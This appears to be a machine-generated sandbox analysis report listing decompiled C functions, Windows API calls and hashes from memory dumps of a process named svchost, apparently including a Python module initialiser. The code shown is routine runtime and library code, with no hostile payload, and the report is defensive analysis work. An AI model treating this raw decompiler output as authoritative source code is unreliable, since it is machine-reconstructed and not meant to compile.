                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E00BCCDB3(struct _FILETIME _a4, intOrPtr _a8, signed int _a12, void* _a16) {
                            				signed int _v8;
                            				struct _SYSTEMTIME _v24;
                            				struct _SYSTEMTIME _v40;
                            				signed int _v44;
                            				signed int _t20;
                            				signed int _t26;
                            				signed int _t27;
                            				signed int _t43;
                            				signed int _t46;
                            
                            				_t20 =  *0xbec008; // 0xdc55bb75
                            				_v8 = _t20 ^ _t46;
                            				if(_a4.dwLowDateTime != 0 || _a8 != 0) {
                            					if(FileTimeToSystemTime( &_a4,  &_v40) == 0 || SystemTimeToTzSpecificLocalTime(0,  &_v40,  &_v24) == 0) {
                            						_t26 = E00BCC998(GetLastError());
                            						goto L8;
                            					} else {
                            						_v44 = _v44 | 0xffffffff;
                            						_t27 = E00BCCE5D( &_v24,  &(_v24.wMonth),  &(_v24.wDay),  &(_v24.wHour),  &(_v24.wMinute),  &(_v24.wSecond),  &_v44);
                            						if((_t27 & _t43) == 0xffffffff) {
                            							_t26 = E00BCC9CE();
                            							 *_t26 = 0x84;
                            							L8:
                            							_t27 = _t26 | 0xffffffff;
                            						}
                            					}
                            				} else {
                            					_t27 = _a12;
                            				}
                            				E00BC786A();
                            				return _t27;
                            			}













                            APIs
                            • FileTimeToSystemTime.KERNEL32(00000000,?,?,?,00000000,00000000,000000FF,?,?,00000000), ref: 00BCCDE1
                            • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00BCCDF5
                            • GetLastError.KERNEL32 ref: 00BCCE3D
                            • __dosmaperr.LIBCMT ref: 00BCCE44
                            Memory Dump Source
                            • Source File: 0000000B.00000002.486093473.0000000000BC1000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                            • Associated: 0000000B.00000002.486086039.0000000000BC0000.00000002.00020000.sdmp
                            • Associated: 0000000B.00000002.486114661.0000000000BE0000.00000002.00020000.sdmp
                            • Associated: 0000000B.00000002.486126670.0000000000BEC000.00000004.00020000.sdmp
                            • Associated: 0000000B.00000002.486134901.0000000000BF5000.00000004.00020000.sdmp
                            • Associated: 0000000B.00000002.486143361.0000000000BF7000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_bc0000_svchost.jbxd
                            Similarity
                            • API ID: Time$System$ErrorFileLastLocalSpecific__dosmaperr
                            • String ID:
                            • API String ID: 593088924-0
                            • Opcode ID: f54be86c729cadeda82c0f5de60323b3e2fea15e0f44ca57e7542794b1418b2a
                            • Instruction ID: 4a551bcde6aa1bf4fc9a2c113122b7f96ba56e21cc61711b6179efebfa9cc4a0
                            • Opcode Fuzzy Hash: f54be86c729cadeda82c0f5de60323b3e2fea15e0f44ca57e7542794b1418b2a
                            • Instruction Fuzzy Hash: 59212E7290010DABCB01DFE4C985FDE7BFCEB19320F1046AAE51AD7180EB74EA449B61
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 83%
                            			E00BCFD60(signed int __eax, void* __ecx, void* __edx) {
                            				signed int _t2;
                            				signed int _t3;
                            				int _t10;
                            				int _t11;
                            				void* _t13;
                            				void* _t16;
                            				short** _t17;
                            				char* _t20;
                            				void* _t21;
                            
                            				_t16 = __edx;
                            				_t13 = __ecx;
                            				_t17 =  *0xbf60c0; // 0xe19000
                            				if(_t17 != 0) {
                            					_t10 = 0;
                            					while( *_t17 != _t10) {
                            						_t2 = WideCharToMultiByte(_t10, _t10,  *_t17, 0xffffffff, _t10, _t10, _t10, _t10);
                            						_t11 = _t2;
                            						if(_t11 == 0) {
                            							L11:
                            							_t3 = _t2 | 0xffffffff;
                            						} else {
                            							_t20 = E00BD0B10(_t13, _t11, 1);
                            							_pop(_t13);
                            							if(_t20 == 0) {
                            								L10:
                            								_t2 = E00BD09EB(_t20);
                            								goto L11;
                            							} else {
                            								_t10 = 0;
                            								if(WideCharToMultiByte(0, 0,  *_t17, 0xffffffff, _t20, _t11, 0, 0) == 0) {
                            									goto L10;
                            								} else {
                            									_push(0);
                            									_push(_t20);
                            									E00BD6882(_t16);
                            									E00BD09EB(0);
                            									_t21 = _t21 + 0xc;
                            									_t17 =  &(_t17[1]);
                            									continue;
                            								}
                            							}
                            						}
                            						L9:
                            						return _t3;
                            						goto L12;
                            					}
                            					_t3 = 0;
                            					goto L9;
                            				} else {
                            					return __eax | 0xffffffff;
                            				}
                            				L12:
                            			}













                            Memory Dump Source
                            • Source File: 0000000B.00000002.486093473.0000000000BC1000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                            • Associated: 0000000B.00000002.486086039.0000000000BC0000.00000002.00020000.sdmp
                            • Associated: 0000000B.00000002.486114661.0000000000BE0000.00000002.00020000.sdmp
                            • Associated: 0000000B.00000002.486126670.0000000000BEC000.00000004.00020000.sdmp
                            • Associated: 0000000B.00000002.486134901.0000000000BF5000.00000004.00020000.sdmp
                            • Associated: 0000000B.00000002.486143361.0000000000BF7000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_bc0000_svchost.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 4112b8b385c0efe93e0ef88f3bed21e884952941f3919d8b368548fec413c467
                            • Instruction ID: b4730f9bc0fce8f0e59af90b5c2d0b0e9d6bd255e4d76e49db292e07446bd84c
                            • Opcode Fuzzy Hash: 4112b8b385c0efe93e0ef88f3bed21e884952941f3919d8b368548fec413c467
                            • Instruction Fuzzy Hash: E1014FB22196167EE62026787CC1F7B678EDB517B8B3003FAB522562D6EE608D404170
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 82%
                            			E00BCFDDF(signed int __eax, void* __ecx) {
                            				signed int _t2;
                            				signed int _t3;
                            				int _t10;
                            				int _t11;
                            				void* _t13;
                            				char** _t16;
                            				short* _t19;
                            				void* _t20;
                            
                            				_t13 = __ecx;
                            				_t16 =  *0xbf60bc; // 0xe016f8
                            				if(_t16 != 0) {
                            					_t10 = 0;
                            					while( *_t16 != _t10) {
                            						_t2 = MultiByteToWideChar(_t10, _t10,  *_t16, 0xffffffff, _t10, _t10);
                            						_t11 = _t2;
                            						if(_t11 == 0) {
                            							L11:
                            							_t3 = _t2 | 0xffffffff;
                            						} else {
                            							_t19 = E00BD0B10(_t13, _t11, 2);
                            							_pop(_t13);
                            							if(_t19 == 0) {
                            								L10:
                            								_t2 = E00BD09EB(_t19);
                            								goto L11;
                            							} else {
                            								_t10 = 0;
                            								if(MultiByteToWideChar(0, 0,  *_t16, 0xffffffff, _t19, _t11) == 0) {
                            									goto L10;
                            								} else {
                            									_push(0);
                            									_push(_t19);
                            									E00BD688D(_t13);
                            									E00BD09EB(0);
                            									_t20 = _t20 + 0xc;
                            									_t16 =  &(_t16[1]);
                            									continue;
                            								}
                            							}
                            						}
                            						L9:
                            						return _t3;
                            						goto L12;
                            					}
                            					_t3 = 0;
                            					goto L9;
                            				} else {
                            					return __eax | 0xffffffff;
                            				}
                            				L12:
                            			}

                            Memory Dump Source
                            • Source File: 0000000B.00000002.486093473.0000000000BC1000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                            • Associated: 0000000B.00000002.486086039.0000000000BC0000.00000002.00020000.sdmp
                            • Associated: 0000000B.00000002.486114661.0000000000BE0000.00000002.00020000.sdmp
                            • Associated: 0000000B.00000002.486126670.0000000000BEC000.00000004.00020000.sdmp
                            • Associated: 0000000B.00000002.486134901.0000000000BF5000.00000004.00020000.sdmp
                            • Associated: 0000000B.00000002.486143361.0000000000BF7000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_bc0000_svchost.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 42481826ff54556150f7c498a9549e5e6c2a2596191a049dc4f824a047f0429d
                            • Instruction ID: 76001e29df8b619b49f29c451b7c4ad83695d9afa8330a9e941d145cd708ac9e
                            • Opcode Fuzzy Hash: 42481826ff54556150f7c498a9549e5e6c2a2596191a049dc4f824a047f0429d
                            • Instruction Fuzzy Hash: F20162B261921B7FA6112AB87CC1F7B6B9EDB5177873107FEB521922E7EE608D004160
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E00BC90D6() {
                            				void* _t4;
                            				void* _t8;
                            
                            				E00BC95F4();
                            				E00BC9588();
                            				if(E00BC92E8() != 0) {
                            					_t4 = E00BC929A(_t8, __eflags);
                            					__eflags = _t4;
                            					if(_t4 != 0) {
                            						return 1;
                            					} else {
                            						E00BC9324();
                            						goto L1;
                            					}
                            				} else {
                            					L1:
                            					return 0;
                            				}
                            			}

                            APIs
                            • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00BC90D6
                            • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00BC90DB
                            • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00BC90E0
                              • Part of subcall function 00BC92E8: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 00BC92F9
                            • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00BC90F5
                            Memory Dump Source
                            • Source File: 0000000B.00000002.486093473.0000000000BC1000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                            • Associated: 0000000B.00000002.486086039.0000000000BC0000.00000002.00020000.sdmp
                            • Associated: 0000000B.00000002.486114661.0000000000BE0000.00000002.00020000.sdmp
                            • Associated: 0000000B.00000002.486126670.0000000000BEC000.00000004.00020000.sdmp
                            • Associated: 0000000B.00000002.486134901.0000000000BF5000.00000004.00020000.sdmp
                            • Associated: 0000000B.00000002.486143361.0000000000BF7000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_bc0000_svchost.jbxd
                            Similarity
                            • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                            • String ID:
                            • API String ID: 1761009282-0
                            • Opcode ID: e28c8e4002e4feb3b2185dbbe633f88e05227d084f504df5a77bd89c2bb576a4
                            • Instruction ID: 76da824d50cd6e6abd7294b6a2d22ff83fb1d0fad9f1d953e4eea3a2205714e5
                            • Opcode Fuzzy Hash: e28c8e4002e4feb3b2185dbbe633f88e05227d084f504df5a77bd89c2bb576a4
                            • Instruction Fuzzy Hash: 10C04894000B11A43E213AB0229FFED33C08DF33C6BC0A4CDE8E09B0438E07044A613B
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E00BCD646(void* __edx, short* _a4, char* _a8, int _a12, intOrPtr _a16) {
                            				char* _v8;
                            				int _v12;
                            				char _v16;
                            				char _v24;
                            				char _v28;
                            				void* __ebx;
                            				char _t34;
                            				int _t35;
                            				int _t38;
                            				long _t39;
                            				char* _t42;
                            				int _t44;
                            				int _t47;
                            				int _t53;
                            				intOrPtr _t55;
                            				void* _t56;
                            				char* _t57;
                            				char* _t62;
                            				char* _t63;
                            				void* _t64;
                            				int _t65;
                            				short* _t67;
                            				short* _t68;
                            				int _t69;
                            				intOrPtr* _t70;
                            
                            				_t64 = __edx;
                            				_t53 = _a12;
                            				_t67 = _a4;
                            				_t68 = 0;
                            				if(_t67 == 0) {
                            					L3:
                            					if(_a8 != _t68) {
                            						E00BCAFAE(_t53,  &_v28, _t64, _a16);
                            						_t34 = _v24;
                            						__eflags = _t67;
                            						if(_t67 == 0) {
                            							__eflags =  *((intOrPtr*)(_t34 + 0xa8)) - _t68;
                            							if( *((intOrPtr*)(_t34 + 0xa8)) != _t68) {
                            								_t69 = _t68 | 0xffffffff;
                            								_t35 = MultiByteToWideChar( *(_t34 + 8), 9, _a8, _t69, _t68, _t68);
                            								__eflags = _t35;
                            								if(_t35 != 0) {
                            									L29:
                            									_t28 = _t35 - 1; // -1
                            									_t69 = _t28;
                            									L30:
                            									__eflags = _v16;
                            									if(_v16 != 0) {
                            										_t55 = _v28;
                            										_t31 = _t55 + 0x350;
                            										 *_t31 =  *(_t55 + 0x350) & 0xfffffffd;
                            										__eflags =  *_t31;
                            									}
                            									return _t69;
                            								}
                            								 *((intOrPtr*)(E00BCC9CE())) = 0x2a;
                            								goto L30;
                            							}
                            							_t70 = _a8;
                            							_t56 = _t70 + 1;
                            							do {
                            								_t38 =  *_t70;
                            								_t70 = _t70 + 1;
                            								__eflags = _t38;
                            							} while (_t38 != 0);
                            							_t69 = _t70 - _t56;
                            							goto L30;
                            						}
                            						__eflags =  *((intOrPtr*)(_t34 + 0xa8)) - _t68;
                            						if( *((intOrPtr*)(_t34 + 0xa8)) != _t68) {
                            							_t69 = _t68 | 0xffffffff;
                            							_t35 = MultiByteToWideChar( *(_t34 + 8), 9, _a8, _t69, _t67, _t53);
                            							__eflags = _t35;
                            							if(_t35 != 0) {
                            								goto L29;
                            							}
                            							_t39 = GetLastError();
                            							__eflags = _t39 - 0x7a;
                            							if(_t39 != 0x7a) {
                            								L21:
                            								 *((intOrPtr*)(E00BCC9CE())) = 0x2a;
                            								 *_t67 = 0;
                            								goto L30;
                            							}
                            							_t42 = _a8;
                            							_t57 = _t42;
                            							_v8 = _t57;
                            							_t65 = _t53;
                            							__eflags = _t53;
                            							if(_t53 == 0) {
                            								L20:
                            								_t44 = MultiByteToWideChar( *(_v24 + 8), 1, _t42, _t57 - _t42, _t67, _t53);
                            								__eflags = _t44;
                            								if(_t44 != 0) {
                            									_t69 = _t44;
                            									goto L30;
                            								}
                            								goto L21;
                            							} else {
                            								goto L15;
                            							}
                            							while(1) {
                            								L15:
                            								_t45 =  *_t57;
                            								_v12 = _t65 - 1;
                            								__eflags =  *_t57;
                            								if(__eflags == 0) {
                            									break;
                            								}
                            								_t47 = E00BD5F84(__eflags, _t45 & 0x000000ff,  &_v24);
                            								_t62 = _v8;
                            								__eflags = _t47;
                            								if(_t47 == 0) {
                            									L18:
                            									_t65 = _v12;
                            									_t57 = _t62 + 1;
                            									_v8 = _t57;
                            									__eflags = _t65;
                            									if(_t65 != 0) {
                            										continue;
                            									}
                            									break;
                            								}
                            								_t62 = _t62 + 1;
                            								__eflags =  *_t62;
                            								if( *_t62 == 0) {
                            									goto L21;
                            								}
                            								goto L18;
                            							}
                            							_t42 = _a8;
                            							goto L20;
                            						}
                            						__eflags = _t53;
                            						if(_t53 == 0) {
                            							goto L30;
                            						}
                            						_t63 = _a8;
                            						while(1) {
                            							 *_t67 =  *(_t68 + _t63) & 0x000000ff;
                            							__eflags =  *(_t68 + _t63);
                            							if( *(_t68 + _t63) == 0) {
                            								goto L30;
                            							}
                            							_t68 =  &(_t68[0]);
                            							_t67 =  &(_t67[1]);
                            							__eflags = _t68 - _t53;
                            							if(_t68 < _t53) {
                            								continue;
                            							}
                            							goto L30;
                            						}
                            						goto L30;
                            					}
                            					 *((intOrPtr*)(E00BCC9CE())) = 0x16;
                            					return E00BD1788() | 0xffffffff;
                            				}
                            				if(_t53 != 0) {
                            					 *_t67 = 0;
                            					goto L3;
                            				}
                            				return 0;
                            			}

                            APIs
                            • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,?,?,?), ref: 00BCD6DC
                            • GetLastError.KERNEL32 ref: 00BCD6EA
                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,?), ref: 00BCD745
                            Memory Dump Source
                            • Source File: 0000000B.00000002.486093473.0000000000BC1000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                            • Associated: 0000000B.00000002.486086039.0000000000BC0000.00000002.00020000.sdmp
                            • Associated: 0000000B.00000002.486114661.0000000000BE0000.00000002.00020000.sdmp
                            • Associated: 0000000B.00000002.486126670.0000000000BEC000.00000004.00020000.sdmp
                            • Associated: 0000000B.00000002.486134901.0000000000BF5000.00000004.00020000.sdmp
                            • Associated: 0000000B.00000002.486143361.0000000000BF7000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_bc0000_svchost.jbxd
                            Similarity
                            • API ID: ByteCharMultiWide$ErrorLast
                            • String ID:
                            • API String ID: 1717984340-0
                            • Opcode ID: 7aa40cc8d2e38a34afb5c4997f686f97fca70e9123cd3c9adc0e87cfd894ecc9
                            • Instruction ID: a4923514212d478449dbf58d3967fd374813b1facbe30fee6991012fd171e15a
                            • Opcode Fuzzy Hash: 7aa40cc8d2e38a34afb5c4997f686f97fca70e9123cd3c9adc0e87cfd894ecc9
                            • Instruction Fuzzy Hash: 5941C539600246AFDB229F64C884FAABBE5EF41310F2541FEF8599B1A1EB708D01CB50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Executed Functions

                            C-Code - Quality: 100%
                            			E00BD0158(int _a4) {
                            				void* _t14;
                            
                            				if(E00BD3A8A(_t14) != 0 && ( *( *[fs:0x30] + 0x68) >> 0x00000008 & 0x00000001) == 0) {
                            					TerminateProcess(GetCurrentProcess(), _a4);
                            				}
                            				E00BD01DD(_t14, _a4);
                            				ExitProcess(_a4);
                            			}

                            APIs
                            • GetCurrentProcess.KERNEL32(?,?,00BD012E,?,00BEA6E0,0000000C,00BD0285,?,00000002,00000000), ref: 00BD0179
                            • TerminateProcess.KERNEL32(00000000,?,00BD012E,?,00BEA6E0,0000000C,00BD0285,?,00000002,00000000), ref: 00BD0180
                            • ExitProcess.KERNEL32 ref: 00BD0192
                            Memory Dump Source
                            • Source File: 00000013.00000002.478877972.0000000000BC1000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                            • Associated: 00000013.00000002.478868146.0000000000BC0000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.478903755.0000000000BE0000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.478915424.0000000000BEC000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.478923115.0000000000BEE000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.478930775.0000000000BF4000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.478940137.0000000000BF7000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_bc0000_svchost.jbxd
                            Similarity
                            • API ID: Process$CurrentExitTerminate
                            • String ID:
                            • API String ID: 1703294689-0
                            • Opcode ID: 0028a958ab6ba8e6bf7cab1c297951fda38d626cb413f0eaeabacc26406dfd57
                            • Instruction ID: f7df19ccea1d28d888b565b5530267ccda10905c876d93edc68efbf7a8416528
                            • Opcode Fuzzy Hash: 0028a958ab6ba8e6bf7cab1c297951fda38d626cb413f0eaeabacc26406dfd57
                            • Instruction Fuzzy Hash: 4CE04631420188BFCF117F90CD48B497BA9FB00781F000059F808AB222EB75DE82CB90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            APIs
                            • PyModule_Create2.PYTHON38(6DAC7B44,000003F5), ref: 6DAB8467
                            • PyModule_GetDict.PYTHON38(00000000), ref: 6DAB847E
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Module_$Create2Dict
                            • String ID: AlphaBlend$AngleArc$AnimateWindow$AnimateWindow$CLR_NONE$CombineTransform$DrawTextW$DrawTextW$GetLayeredWindowAttributes$GetLayeredWindowAttributes$GetLayout$GetMenuInfo$GetOpenFileNameW$GetSaveFileNameW$GetWorldTransform$GradientFill$ILC_COLOR$ILC_COLOR16$ILC_COLOR24$ILC_COLOR32$ILC_COLOR4$ILC_COLOR8$ILC_COLORDDB$ILC_MASK$ILD_BLEND$ILD_BLEND25$ILD_BLEND50$ILD_FOCUS$ILD_MASK$ILD_NORMAL$ILD_SELECTED$ILD_TRANSPARENT$IMAGE_BITMAP$IMAGE_CURSOR$IMAGE_ICON$LR_CREATEDIBSECTION$LR_DEFAULTCOLOR$LR_DEFAULTSIZE$LR_LOADFROMFILE$LR_LOADMAP3DCOLORS$LR_LOADTRANSPARENT$LR_MONOCHROME$LR_SHARED$LR_VGACOLOR$MaskBlt$ModifyWorldTransform$NIF_ICON$NIF_INFO$NIF_MESSAGE$NIF_STATE$NIF_TIP$NIIF_ERROR$NIIF_ICON_MASK$NIIF_INFO$NIIF_NONE$NIIF_NOSOUND$NIIF_WARNING$NIM_ADD$NIM_DELETE$NIM_MODIFY$NIM_SETVERSION$PlgBlt$SetLayeredWindowAttributes$SetLayeredWindowAttributes$SetLayout$SetMenuInfo$SetWorldTransform$SystemParametersInfo$TPM_BOTTOMALIGN$TPM_CENTERALIGN$TPM_LEFTALIGN$TPM_LEFTBUTTON$TPM_NONOTIFY$TPM_RETURNCMD$TPM_RIGHTALIGN$TPM_RIGHTBUTTON$TPM_TOPALIGN$TPM_VCENTERALIGN$TransparentBlt$UNICODE$UNICODE$UpdateLayeredWindow$UpdateLayeredWindow$dllhandle$error$error$gdi32.dll$gdi32.dll$msimg32.dll$msimg32.dll$user32.dll$user32.dll
                            • API String ID: 1218557240-3017165179
                            • Opcode ID: df7c6a03395ea6349e6638200d8f24198036782a84021098d075e3f1458d6e14
                            • Instruction ID: 8efaceac6c3efa284af96e9068935fc9abe578f1eea1fee1e9604a3aad824a55
                            • Opcode Fuzzy Hash: df7c6a03395ea6349e6638200d8f24198036782a84021098d075e3f1458d6e14
                            • Instruction Fuzzy Hash: DF1217A0E4D30A3EE710277A4C56F3B7E6CEF526A4F084116F94A96283DE36C4C38675
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            C-Code - Quality: 27%
                            			E6DA7BF40(void* __eax) {
                            				void* _t9;
                            				struct HINSTANCE__* _t93;
                            				void* _t95;
                            				struct HINSTANCE__* _t98;
                            				struct HINSTANCE__* _t99;
                            				struct HINSTANCE__* _t100;
                            				struct HINSTANCE__* _t101;
                            				void* _t104;
                            				void* _t105;
                            				void* _t110;
                            				intOrPtr* _t111;
                            				intOrPtr* _t113;
                            				void* _t116;
                            				intOrPtr* _t117;
                            
                            				__imp__?PyWinGlobals_Ensure@@YAHXZ();
                            				if(__eax != 0xffffffff) {
                            					__imp__PyModule_Create2(0x6da88ff0, 0x3f5, _t104);
                            					_t105 = __eax;
                            					if(__eax != 0) {
                            						__imp__PyModule_GetDict(__eax, _t95);
                            						if(__eax != 0) {
                            							_t117 = __imp__PyDict_SetItemString;
                            							 *_t117(__eax, "error",  *__imp__?PyWinExc_ApiError@@3PAU_object@@A, _t110, _t116);
                            							_t111 = __imp__PyLong_FromLong;
                            							 *_t117(__eax, "STD_INPUT_HANDLE",  *_t111(0xfffffff6));
                            							 *_t117(__eax, "STD_OUTPUT_HANDLE",  *_t111(0xfffffff5));
                            							_t9 =  *_t117(__eax, "STD_ERROR_HANDLE",  *_t111(0xfffffff4));
                            							__imp__PyType_Ready(0x6da88000);
                            							if(_t9 == 0xffffffff) {
                            								L21:
                            								return 0;
                            							} else {
                            								_push(0x6da88000);
                            								_push("PyDISPLAY_DEVICEType");
                            								_push(__eax);
                            								if( *_t117() == 0xffffffff) {
                            									goto L21;
                            								} else {
                            									_t113 = __imp__PyModule_AddIntConstant;
                            									 *_t113(__eax, "NameUnknown", 0);
                            									 *_t113(__eax, "NameFullyQualifiedDN", 1);
                            									 *_t113(__eax, "NameSamCompatible", 2);
                            									 *_t113(__eax, "NameDisplay", 3);
                            									 *_t113(__eax, "NameUniqueId", 6);
                            									 *_t113(__eax, "NameCanonical", 7);
                            									 *_t113(__eax, "NameUserPrincipal", 8);
                            									 *_t113(__eax, "NameCanonicalEx", 9);
                            									 *_t113(__eax, "NameServicePrincipal", 0xa);
                            									 *_t113(__eax, "REG_NOTIFY_CHANGE_NAME", 1);
                            									 *_t113(__eax, "REG_NOTIFY_CHANGE_ATTRIBUTES", 2);
                            									 *_t113(__eax, "REG_NOTIFY_CHANGE_LAST_SET", 4);
                            									 *_t113(__eax, "REG_NOTIFY_CHANGE_SECURITY", 8);
                            									 *_t113(__eax, "VOS_DOS", 0x10000);
                            									 *_t113(__eax, "VOS_NT", 0x40000);
                            									 *_t113(__eax, "VOS__WINDOWS16", 1);
                            									 *_t113(__eax, "VOS__WINDOWS32", 4);
                            									 *_t113(__eax, "VOS_OS216", 0x20000);
                            									 *_t113(__eax, "VOS_OS232", 0x30000);
                            									 *_t113(__eax, "VOS__PM16", 2);
                            									 *_t113(__eax, "VOS__PM32", 3);
                            									 *_t113(__eax, "VOS_UNKNOWN", 0);
                            									 *_t113(__eax, "VOS_DOS_WINDOWS16", 0x10001);
                            									 *_t113(__eax, "VOS_DOS_WINDOWS32", 0x10004);
                            									 *_t113(__eax, "VOS_NT_WINDOWS32", 0x40004);
                            									 *_t113(__eax, "VOS_OS216_PM16", 0x20002);
                            									 *_t113(__eax, "VOS_OS232_PM32", 0x30003);
                            									 *_t113(__eax, "VFT_UNKNOWN", 0);
                            									 *_t113(__eax, "VFT_APP", 1);
                            									 *_t113(__eax, "VFT_DLL", 2);
                            									 *_t113(__eax, "VFT_DRV", 3);
                            									 *_t113(__eax, "VFT_FONT", 4);
                            									 *_t113(__eax, "VFT_VXD", 5);
                            									 *_t113(__eax, "VFT_STATIC_LIB", 7);
                            									 *_t113(__eax, "VS_FF_DEBUG", 1);
                            									 *_t113(__eax, "VS_FF_INFOINFERRED", 0x10);
                            									 *_t113(__eax, "VS_FF_PATCHED", 4);
                            									 *_t113(__eax, "VS_FF_PRERELEASE", 2);
                            									 *_t113(__eax, "VS_FF_PRIVATEBUILD", 8);
                            									 *_t113(__eax, "VS_FF_SPECIALBUILD", 0x20);
                            									_t98 = GetModuleHandleW(L"secur32.dll");
                            									if(_t98 != 0) {
                            										L10:
                            										 *0x6da89120 = GetProcAddress(_t98, "GetUserNameExW");
                            										 *0x6da89124 = GetProcAddress(_t98, "GetComputerObjectNameW");
                            									} else {
                            										_t93 = LoadLibraryW(L"secur32.dll"); // executed
                            										_t98 = _t93;
                            										if(_t98 != 0) {
                            											goto L10;
                            										}
                            									}
                            									_t99 = GetModuleHandleW(L"kernel32.dll");
                            									if(_t99 != 0) {
                            										L13:
                            										 *0x6da890f0 = GetProcAddress(_t99, "GetComputerNameExW");
                            										 *0x6da890f4 = GetProcAddress(_t99, "GetLongPathNameA");
                            										 *0x6da890f8 = GetProcAddress(_t99, "GetLongPathNameW");
                            										 *0x6da890fc = GetProcAddress(_t99, "GetHandleInformation");
                            										 *0x6da89100 = GetProcAddress(_t99, "SetHandleInformation");
                            										 *0x6da89104 = GetProcAddress(_t99, "GlobalMemoryStatusEx");
                            										 *0x6da89108 = GetProcAddress(_t99, "GetSystemFileCacheSize");
                            										 *0x6da8910c = GetProcAddress(_t99, "SetSystemFileCacheSize");
                            										 *0x6da89110 = GetProcAddress(_t99, "GetDllDirectoryW");
                            										 *0x6da89114 = GetProcAddress(_t99, "SetDllDirectoryW");
                            										 *0x6da89118 = GetProcAddress(_t99, "SetSystemPowerState");
                            										 *0x6da8911c = GetProcAddress(_t99, "GetNativeSystemInfo");
                            									} else {
                            										_t99 = LoadLibraryW(L"kernel32.dll");
                            										if(_t99 != 0) {
                            											goto L13;
                            										}
                            									}
                            									_t100 = GetModuleHandleW(L"user32.dll");
                            									if(_t100 != 0) {
                            										L16:
                            										 *0x6da890d0 = GetProcAddress(_t100, "EnumDisplayMonitors");
                            										 *0x6da890cc = GetProcAddress(_t100, "EnumDisplayDevicesW");
                            										 *0x6da890c8 = GetProcAddress(_t100, "ChangeDisplaySettingsExW");
                            										 *0x6da890d4 = GetProcAddress(_t100, "MonitorFromWindow");
                            										 *0x6da890d8 = GetProcAddress(_t100, "MonitorFromRect");
                            										 *0x6da890dc = GetProcAddress(_t100, "MonitorFromPoint");
                            										 *0x6da890e0 = GetProcAddress(_t100, "GetMonitorInfoW");
                            										 *0x6da890e4 = GetProcAddress(_t100, "EnumDisplaySettingsExW");
                            										 *0x6da89150 = GetProcAddress(_t100, "GetLastInputInfo");
                            									} else {
                            										_t100 = LoadLibraryW(L"user32.dll");
                            										if(_t100 != 0) {
                            											goto L16;
                            										}
                            									}
                            									_t101 = GetModuleHandleW(L"Advapi32.dll");
                            									if(_t101 != 0) {
                            										L19:
                            										 *0x6da89128 = GetProcAddress(_t101, "RegRestoreKeyW");
                            										 *0x6da8912c = GetProcAddress(_t101, "RegSaveKeyExW");
                            										 *0x6da89130 = GetProcAddress(_t101, "RegCreateKeyTransactedW");
                            										 *0x6da8913c = GetProcAddress(_t101, "RegOpenKeyTransactedW");
                            										 *0x6da89134 = GetProcAddress(_t101, "RegDeleteKeyExW");
                            										 *0x6da89138 = GetProcAddress(_t101, "RegDeleteKeyTransactedW");
                            										 *0x6da89140 = GetProcAddress(_t101, "RegCopyTreeW");
                            										 *0x6da89144 = GetProcAddress(_t101, "RegDeleteTreeW");
                            										 *0x6da89148 = GetProcAddress(_t101, "RegOpenCurrentUser");
                            										 *0x6da8914c = GetProcAddress(_t101, "RegOverridePredefKey");
                            									} else {
                            										_t101 = LoadLibraryW(L"Advapi32.dll");
                            										if(_t101 != 0) {
                            											goto L19;
                            										}
                            									}
                            									return _t105;
                            								}
                            							}
                            						} else {
                            							return __eax;
                            						}
                            					} else {
                            						return __eax;
                            					}
                            				} else {
                            					return 0;
                            				}
                            			}


















                            APIs
